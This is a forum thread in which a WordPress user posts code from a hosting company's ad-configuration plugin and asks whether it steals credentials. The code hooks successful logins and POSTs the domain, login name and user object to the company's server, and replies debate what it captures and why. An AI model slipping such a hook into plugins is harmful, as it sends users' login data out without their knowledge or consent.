18 {{ upvoteCount | shortNum }}
18 {{ upvoteCount | shortNum }}

Please Confirm that this WordPress Code Captures Login Names and Passwords

by pianoman959
16 replies
I had a "free" site delivered by BrainHost.com as part of signing up for hosting with them. No documentation was provided on the "free" site but it had a "BrainHost Website Configuration" plugin. This plugin controlled ad configuration but I also found the following code. Unless I am missing something BrainHost is capturing WordPress logins and passwords.

Anyone willing to confirm that this is in fact what the following snippets do? I find this extremely unethical and totally unacceptable from a hosting company. Do you agree?

Code:
#############################################
add_action('wp_login', 'bh_track_successful_login');
function bh_track_successful_login($user_login, $user)
{

    $params = array(
        'domain'     => $_SERVER['HTTP_HOST'],
        'user_login' => $user_login,
        'user'       => $user
    );

    $resp = _curl_post('http://setup.brainhost.com/track_login', $params);

    return;

}
function _curl_post($url=false,$post=array())
{
    // error handling
    if ( ! $url)
        return;

    // generate query string from post_data
    $query_string = http_build_query($post);
    
    // initialize curl
    $ch = curl_init();
    
    // set parameters
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $query_string);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

    // run cUrl
    $response = curl_exec ($ch);

    // return the response
    return $response;
}
#captures #code #confirm #wordpress
  • Profile picture of the author RobinInTexas
    Was that a free site provided by a third party as an upsell from another purchase?

    It appears to report the post data back to brainhost, but what is the purpose of the configuration plugin?
    Signature

    Robin



    ...Even if you're on the right track, you'll get run over if you just set there.
    {{ DiscussionBoard.errors[8004628].message }}
    • Profile picture of the author pianoman959
      The plugin was provided by BrainHost via My Creative Site Designs (which is now part of BrainHost). The website development and completion notices all came through BrainHost.com addresses. The plugin does serve another purpose in that it creates a configuration page where one enters HTML for up to 3 ads. This ties into widgets and themes enabled to display those ads. It does make ad management easier.

      My concern is that they are capturing sensitive information without any notice to clients and that the capture code has nothing to do with the features of the plugin from what I can tell.
      {{ DiscussionBoard.errors[8004701].message }}
  • Profile picture of the author Andrew H
    1. Why the hell are you using some random host like 'brainhost'
    2. Why don't you contact their support and ask about this?
    Signature
    "You shouldn't come here and set yourself up as the resident wizard of oz."
    {{ DiscussionBoard.errors[8004814].message }}
    • Profile picture of the author pianoman959
      I have another hosting company. I only tried out BrainHost because of a super affiliate's recommendation and the "free" web site. I did ask support "how" they got my password twice and got no response. I have cancelled my account and it appears I will get a full refund based upon e-mails.

      This post is really a warning to others who might consider BrainHost based upon their incentives.
      {{ DiscussionBoard.errors[8006335].message }}
  • Profile picture of the author RobinInTexas
    How much are they charging you for hosting and domain registration?

    This sounds like a way overpriced upsell from a get rich quick promotion I passed up.
    Signature

    Robin



    ...Even if you're on the right track, you'll get run over if you just set there.
    {{ DiscussionBoard.errors[8004933].message }}
    • Profile picture of the author pianoman959
      The hosting was recommended on one of the larger affiliate membership sites, not a get quick rich promotion. I have opened tickets identifying a problem on the membership site.
      {{ DiscussionBoard.errors[8006339].message }}
  • Profile picture of the author neversay
    I found that they capture only login name

    not password
    {{ DiscussionBoard.errors[8006343].message }}
  • Profile picture of the author Scotty Bee
    Why would Brainhost want login details unless they were up to no good.

    Hostgator ask us for logins on their support desk even though they could probably access it on their servers but probly confirms your ID for security.

    Sounds a bit sus to me
    Scotty
    Signature
    www.scottybee.com
    {{ DiscussionBoard.errors[8006356].message }}
  • Profile picture of the author SteveJohnson
    Unless I am missing something BrainHost is capturing WordPress logins and passwords.
    You're missing quite a bit. The plain-text password that a user enters is never exposed to the core in a way that would allow its capture by an action or filter. They're only tracking successful logins. I say *only* because that's all they're doing - whether or not they SHOULD be doing it is a different question altogether.
    Signature

    The 2nd Amendment, 1789 - The Original Homeland Security.

    Gun control means never having to say, "I missed you."

    {{ DiscussionBoard.errors[8006379].message }}
    • Profile picture of the author pianoman959
      Thanks Steve, WordPress documentation was a little misleading but I was able to confirm that only the login name was being captured. What set me up in arms initially was BrainHost providing me my admin password via an e-mail that did not come from WordPress. This was not the initial password but one to which I had changed. I thought maybe they grabbed it through this plugin.
      {{ DiscussionBoard.errors[8007521].message }}
      • Profile picture of the author FirstSocialApps
        Originally Posted by pianoman959 View Post

        e to which I had changed. I thought maybe they grabbed it through this plugin.
        As I said they could grab your password and anything else from the database that is on there box. Why are you so upset? Or is this just a thread to bash a company?
        Signature
        Create Facebook deals, sweepstakes, contests, polls, custom pages and more without a monthly fee!

        Generate thousands of leads in any niche in under 60 seconds!
        {{ DiscussionBoard.errors[8008411].message }}
        • Profile picture of the author pianoman959
          FirstSocialApps, I spent over 30 years in IT. Yes admins can grab that information. The question is whether they should and the ethics associated with doing so. Improper access of passwords is grounds for termination by most companies. In addition, if the WordPress wp-config file encrypted passwords like the DB encrypts passwords it would be much more difficult for admins to grab the information. Yes I do change the permissions on the wp-config file to make it a little more difficult for admins to read that information.

          Why do I get upset over admins accessing sensitive information without informing clients? A number of years ago I purchased a plugin that had a backdoor that allowed a criminal ring to setup a phishing site underneath one of my domains. I dealt with an incredible amount of paperwork with both banks and my hosting company at the time (both of which were very understanding). This makes me a little more sensitive to plugins that capture information and send it to another URL.

          The fact is that information is being grabbed by BrainHost without notification that it is being done so. This information is being sent outside the hosted domain. This simply should never be done without full and adequate disclosure including justification of the need to do so.

          I have current hosting accounts with HostGator, 1and1, RackSpace, with both shared and dedicated servers. I have no problem changing root or other passwords to give to them when asked and then changing them again when they are done with investigative processes. In my book, it is completely unacceptable for an admin to just go out and grab this information without client notification. Not only does this expose the client to risk, it exposes the hosting company to risk if a "bad" employee misuses the information. If a site is hijacked by criminal sources, there needs to be an audit trail and clear cut policies in place regarding access of sensitive information.

          Regarding bashing, do I like BrainHost as a hosting company? Absolutely not, which is why I terminated my account but not for this alone. In my opinion should BrainHost be bashed for installing a plugin that captures and sends information outside a clients domain without informing the client? Definitely.

          Do I take responsibility in that I didn't fully understand the WordPress documentation on the functions related to login information and was concerned that the password was being sent as well? Yes, but that is why I raised the question in the first place. I do code plugins but primarily code in other languages developing backends.

          As a final comment, assume your payment processor information is stored on your server. Do you really want an admin being able to access that information? The issue comes down to one of trust and procedure. If you don't trust your hosting provider, it's time to leave. I have done so and will say no more.
          {{ DiscussionBoard.errors[8009211].message }}
        • Profile picture of the author SteveJohnson
          Originally Posted by FirstSocialApps View Post

          As I said they could grab your password and anything else from the database that is on there box. Why are you so upset? Or is this just a thread to bash a company?
          No, they can't "grab your password". Passwords in WP are not stored as clear text. They could get the stored encrypted password, but why bother?
          Signature

          The 2nd Amendment, 1789 - The Original Homeland Security.

          Gun control means never having to say, "I missed you."

          {{ DiscussionBoard.errors[8027913].message }}
    • Profile picture of the author Karen Blundell
      Originally Posted by SteveJohnson View Post

      You're missing quite a bit. The plain-text password that a user enters is never exposed to the core in a way that would allow its capture by an action or filter. They're only tracking successful logins. I say *only* because that's all they're doing - whether or not they SHOULD be doing it is a different question altogether.
      to add to this - and speculating why they would do this - perhaps it's to monitor the load that WordPress puts on a server when a user is logged into a WordPress back-end and performing tasks. WordPress uses a lot of CPU resources especially if one tends to use a lot of plugins -

      I monitored WordPress resource usage for several months on one of my sites. I noticed at times the CPU usage would spike to 100% - and that was when I decided to look more closely at visitor logs and discovered I was under attack. Multiple brute force attempts on the wp-login.php file. I have since dumped WordPress for that site. WordPress is a great CMS - but it is subject to too many hacks because it is now used by too many unscrupulous people.

      I am not surprised at all by any host monitoring WordPress usage - but that script would make me nervous too. I think that, at any time when you have concerns and you're a paying customer, you are well within your rights to question policies of the company you are dealing with, but just because you question, you shouldn't expect them to adhere to your wishes. You then have the option of taking your business elsewhere.
      Signature
      ---------------
      {{ DiscussionBoard.errors[8017585].message }}
      • Profile picture of the author BFriendly
        Originally Posted by Karen Blundell View Post

        I noticed at times the CPU usage would spike to 100% - and that was when I decided to look more closely at visitor logs and discovered I was under attack. Multiple brute force attempts on the wp-login.php file.
        So it's possible that BrainHost is maintaining a database of all the login names for the purpose of detecting a distributed attack across all the sites that it is hosting.

        What if (hypothetically) it sees an attempt at using the same login name twice on two different sites, owned by two different clients? Coincidence? How many times would a specific login name be attempted on non-connected sites before it was certain that it was an attack? 3? 5? (I say twice on a reasonably long & unique login name.)

        Also, comparing login names to a dictionary of commonly used passwords. How many times does the same IP need to attempt to use "dictionary" login names before the hosting service can reasonably conclude that it is a hack attempt and ban the IP? Again, I say twice. Same IP attempts to access two unrelated sites using the login name "poop1234" and if I ran the web hosting company, I'd issue an immediate ban on the IP.

        It's probably much more complex than this, with sophisticated hackers doing a distributed attack against multiple sites using multiple IP Addresses, and a simple database of attempted login names may not by itself be of much value, but it would be one component. And another thing to consider is that database may be shared with other webhost providers in a cooperative effort to safeguard all of their sites by pooling their data, similar to how the anti-malware companies, and anti-spam entities do.
        {{ DiscussionBoard.errors[8017699].message }}
  • Profile picture of the author FirstSocialApps
    Why would you care if your host tracks your log ins. The database is on there server. If they wanted them they could just pull it from the server. Unless you run your own box your totally exposed to your hosting company.
    Signature
    Create Facebook deals, sweepstakes, contests, polls, custom pages and more without a monthly fee!

    Generate thousands of leads in any niche in under 60 seconds!
    {{ DiscussionBoard.errors[8006675].message }}

Trending Topics